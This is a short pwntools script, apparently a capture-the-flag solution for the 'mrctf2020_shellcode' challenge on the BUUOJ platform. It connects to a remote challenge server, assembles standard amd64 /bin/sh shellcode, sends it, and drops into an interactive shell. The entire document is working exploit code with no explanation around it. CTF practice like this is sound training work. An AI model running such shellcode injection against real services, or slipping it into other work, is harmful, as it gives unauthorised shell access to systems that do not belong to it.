1. from pwn import*
    2. context.arch = 'amd64'
    3. io = remote("node4.buuoj.cn",25647)
    4. elf=ELF('./mrctf2020_shellcode')
    5. shellcode = asm(shellcraft.sh())
    6. io.sendline(shellcode)
    7. io.interactive()